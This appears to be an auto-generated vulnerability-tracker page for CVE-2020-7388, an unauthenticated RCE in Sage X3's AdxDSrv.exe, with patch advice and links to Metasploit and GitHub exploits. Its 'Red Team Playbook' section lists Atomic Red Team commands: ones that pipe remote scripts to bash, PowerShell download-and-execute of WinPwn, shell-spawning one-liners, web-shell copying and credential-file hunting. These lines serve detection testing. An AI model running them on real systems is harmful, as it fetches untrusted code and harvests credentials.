CVE-2020-7388
Overview
This vulnerability is an authentication bypass in the AdxDSrv.exe component of Sage X3, caused by improper validation of client-side authentication requests. The flaw allows manipulation of authentication parameters, enabling attackers to circumvent credential checks. The issue specifically affects the authentication mechanism within the AdxDSrv.exe process, which handles client-server communication for Sage X3.
Vulnerability Description
Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.
Impact
An unauthenticated attacker with network access can execute arbitrary commands as SYSTEM on the affected server by bypassing authentication controls, enabling full system compromise. No user interaction or privileges are required, and the attack surface is exposed remotely (CVSS vector AV:N/AC:L/PR:N/UI:N). This can lead to unauthorized data access, system manipulation, and potential lateral movement within enterprise environments running vulnerable Sage X3 versions.
Solution
Apply the AdxAdmin 93.2.53 update, which includes fixes for this vulnerability and ships with on-premises Sage X3 versions 9 (Syracuse 9.22.7.2+), HR & Payroll 9 (Syracuse 9.24.1.3+), 11 (Syracuse 11.25.2.6+), and 12 (Syracuse 12.10.2.8+). Refer to the vendor advisory at https://rapid7.com/blog/post/2021/07/07/sage-x3-multiple-vulnerabilities-fixed and SageCity announcement for detailed patching instructions and supported version information.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the AdxDSrv.exe component of Sage X3 allows for unauthenticated remote command execution, posing a significant threat to organizations utilizing this software. This flaw arises from improper validation of client-side authentication requests, enabling an attacker to bypass credential checks entirely. The exploitation of this vulnerability requires knowledge of the installation path, which can be obtained through another related vulnerability. This interdependency highlights a critical attack vector where an adversary can leverage multiple weaknesses to gain unauthorized access and execute arbitrary commands with SYSTEM privileges, leading to severe consequences for the affected systems.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. By manipulating the authentication request sent to the server, an attacker can execute commands remotely without any prior authentication. This could be achieved through various means, such as network sniffing or social engineering tactics to gather necessary information about the installation path. Once the attacker has this information, they can craft a malicious request to gain control over the system. The potential for exploitation is exacerbated by the fact that many organizations may not have implemented adequate security measures, leaving them vulnerable to such attacks.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on Sage X3 for critical operations. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential data breaches. The ability to execute commands as a SYSTEM user means that an attacker could manipulate system configurations, install malware, or exfiltrate sensitive information without detection. The financial and reputational damage resulting from such incidents can be substantial, as organizations may face regulatory penalties, loss of customer trust, and significant recovery costs. Moreover, the interconnected nature of modern IT environments means that a breach in one system could have cascading effects across an organization’s entire infrastructure.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize the implementation of robust security practices. Regularly updating software to the latest versions is crucial, as patches have been released to address this issue in various versions of Sage X3. Organizations should also conduct thorough security assessments to identify any potential weaknesses in their systems, including those related to authentication and access controls. Employing intrusion detection systems (IDS) can help monitor for anomalous behavior indicative of exploitation attempts. Furthermore, implementing network segmentation can limit the potential impact of an attack, restricting an adversary's ability to move laterally within the network.
In conclusion, the vulnerability within the AdxDSrv.exe component of Sage X3 represents a significant threat to organizations that utilize this software. The potential for unauthenticated remote command execution poses a serious risk, particularly when combined with the ability to exploit related vulnerabilities. Organizations must take proactive measures to detect and mitigate these risks, ensuring that their systems are updated and secure against potential exploitation. By adopting a comprehensive security strategy, businesses can protect themselves from the severe consequences associated with this and similar vulnerabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sage | Adxadmin | All |
cpe:2.3:a:sage:adxadmin:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Sage X3 Administration Service Authentication Bypass Command Execution
exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec
|
- | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ac3lives/sagex3-cve-2020-7388-poc
Proof of concept exploit code for CVE-2020-7388, an unauthenticated RCE as SYSTEM on Sage X3's AdxDSrv Service
|
ac3lives | 3 | 0 | 2023-03-15 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-7388 |
| rapid7.com |
GitHub CVE
x_refsource_MISC
|
https://rapid7.com/blog/post/2021/07/07/sage-x3-multiple-vulnerabilities-fixed |
| sagecity.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches |
| rapid7.com |
NVD API
Exploit
Third Party Advisory
|
https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/ |